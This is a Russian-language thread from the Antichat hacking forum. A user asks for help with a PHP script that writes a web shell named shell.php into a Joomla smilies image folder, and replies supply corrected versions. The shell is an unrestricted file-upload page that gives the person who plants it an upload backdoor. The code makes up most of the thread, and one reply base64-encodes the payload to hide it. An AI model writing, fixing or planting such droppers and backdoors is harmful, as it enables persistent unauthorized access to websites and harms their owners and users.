Форум АНТИЧАТ - скрипт для закачки шелла

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - скрипт для закачки шелла - Непонятная ошибка (https://forum.antichat.xyz/showthread.php?t=49813)

скрипт для закачки шелла - Непонятная ошибка

Здравствуйте!
Я тут скриптик один дописал для закачки шелла, но там постоянно лезет ошибка начиная с 11-й строки, скажите, в чём ошибка?

Выдаёт
Parse error: parse error, unexpected T_STRING in z:\home\localhost\www\script2.php on line 11

<?php

$file = fopen("Z:\\home\localhost\www\joomla\images\smilie s\shell.php", "w");

fwrite ($file, "<html>
<head>
<title>Результат загрузки файла</title>
</head>
<body>
<h2><p><b> Форма для загрузки файлов </b></p></h2>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="filename"><br>
<input type="submit" value="Загрузить"><br>
</form>
<?php
if(isset($_FILES)) {
if($_FILES["filename"]["size"] > 1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
if(copy($_FILES["filename"]["tmp_name"],
"C:\WebServers\home\localhost\www\joomla\images\sm ilies\

".$_FILES["filename"]["name"]))
{
echo("Файл успешно загружен <br>");
echo("Характеристики файла: <br>");
echo("Имя файла: ");
echo($_FILES["filename"]["name"]);
echo("<br>Размер файла: ");
echo($_FILES["filename"]["size"]);
echo("<br>Каталог для загрузки: ");
echo($_FILES["filename"]["tmp_name"]);
echo("<br>Тип файла: ");
echo($_FILES["filename"]["type"]);
} else {
echo("Ошибка загрузки файла");}
}
else {
echo "Загрузите файлы!";
};
?>
</body>
</html>");

fclose($file);

?>

1) ты _вообще_ не экранировал ковычки

PHP код:


		
			
<?php



$file = fopen("Z:\\home\localhost\www\joomla\images\smilies\shell.php", "w");



fwrite ($file, "<html>

<head>

<title>Результат загрузки файла</title>

</head>

<body>

<h2><p><b> Форма для загрузки файлов </b></p></h2>

<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">

<input type=\"file\" name=\"filename\"><br>

<input type=\"submit\" value=\"Загрузить\"><br>

</form>

<?php

if(isset($_FILES)) {

if($_FILES[\"filename\"][\"size\"] > 1024*3*1024)

{

echo (\"Размер файла превышает три мегабайта\");

exit;

}

if(copy($_FILES[\"filename\"][\"tmp_name\"],

\"C:\WebServers\home\localhost\www\joomla\images\smi lies\



\".$_FILES[\"filename\"][\"name\"]))

{

echo(\"Файл успешно загружен <br>\");

echo(\"Характеристики файла: <br>\");

echo(\"Имя файла: \");

echo($_FILES[\"filename\"][\"name\"]);

echo(\"<br>Размер файла: \");

echo($_FILES[\"filename\"][\"size\"]);

echo(\"<br>Каталог для загрузки: \");

echo($_FILES[\"filename\"][\"tmp_name\"]);

echo(\"<br>Тип файла: \");

echo($_FILES[\"filename\"][\"type\"]);

} else {

echo(\"Ошибка загрузки файла\");}

}

else {

echo \"Загрузите файлы!\";

};

?>

</body>

</html>");



fclose($file);



?>

2) проще заменить " на ' или ещё проще в base64 всё запихнуть

PHP код:


		
			
<?php

$data=base64_decode("PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT7Q5efz6/zy4PIg5+Dj8PPn6ugg9ODp6+A8L3RpdGxlPg0KPC9oZWFkPg0KPGJvZHk+DQo8aDI+PHA+PGI+INTu8OzgIOTr/yDn4OPw8+fq6CD04Onr7uIgPC9iPjwvcD48L2gyPg0KPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+DQo8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZW5hbWUiPjxicj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSLH4OPw8+fo8vwiPjxicj4NCjwvZm9ybT4NCjw/cGhwDQppZihpc3NldCgkX0ZJTEVTKSkgew0KaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQp7DQplY2hvICgi0ODn7OXwIPTg6evgIO/w5eL7+ODl8iDy8Ogg7OXj4OHg6fLgIik7DQpleGl0Ow0KfQ0KaWYoY29weSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLA0KIkM6XFdlYlNlcnZlcnNcaG9tZVxsb2NhbGhvc3Rcd3d3XGpvb21sYVxpbWFnZXNcc21pIGxpZXNcDQoNCiIuJF9GSUxFU1siZmlsZW5hbWUiXVsibmFtZSJdKSkNCnsNCmVjaG8oItTg6esg8/Hv5fjt7iDn4OPw8+bl7SA8YnI+Iik7DQplY2hvKCLV4PDg6vLl8Ojx8ujq6CD04Onr4DogPGJyPiIpOw0KZWNobygiyOz/IPTg6evgOiAiKTsNCmVjaG8oJF9GSUxFU1siZmlsZW5hbWUiXVsibmFtZSJdKTsNCmVjaG8oIjxicj7Q4Ofs5fAg9ODp6+A6ICIpOw0KZWNobygkX0ZJTEVTWyJmaWxlbmFtZSJdWyJzaXplIl0pOw0KZWNobygiPGJyPsrg8uDr7uMg5Ov/IOfg4/Dz5+roOiAiKTsNCmVjaG8oJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSk7DQplY2hvKCI8YnI+0ujvIPTg6evgOiAiKTsNCmVjaG8oJF9GSUxFU1siZmlsZW5hbWUiXVsidHlwZSJdKTsNCn0gZWxzZSB7DQplY2hvKCLO+Ojh6uAg5+Dj8PPn6ugg9ODp6+AiKTt9DQp9DQplbHNlIHsNCmVjaG8gIsfg4/Dz5+jy5SD04Onr+yEiOw0KfTsNCj8+DQo8L2JvZHk+DQo8L2h0bWw+");

$file = fopen("Z:\\home\localhost\www\joomla\images\smilies\shell .php", "w");

fwrite ($file, $data);

fclose($file);

?>

Есть такая забавная конструкция в php, которая существенно облегчит твою задачу:

PHP код:


		
			


$var = <<<HTML



чего то там с кавычками " ',

тегами пхп ?> %> и тем, чего только твоя душа захочет



This uses the "here document" syntax to output

multiple lines with $variable interpolation. Note

that the here document terminator must appear on a

line with just a semicolon. no extra whitespace!



HTML; //<-- обязательно с новой строки и с ; в конце. Вместо HTML любая последовательность в верхнем регистре

Спасибо! Вроде бы разобрался :)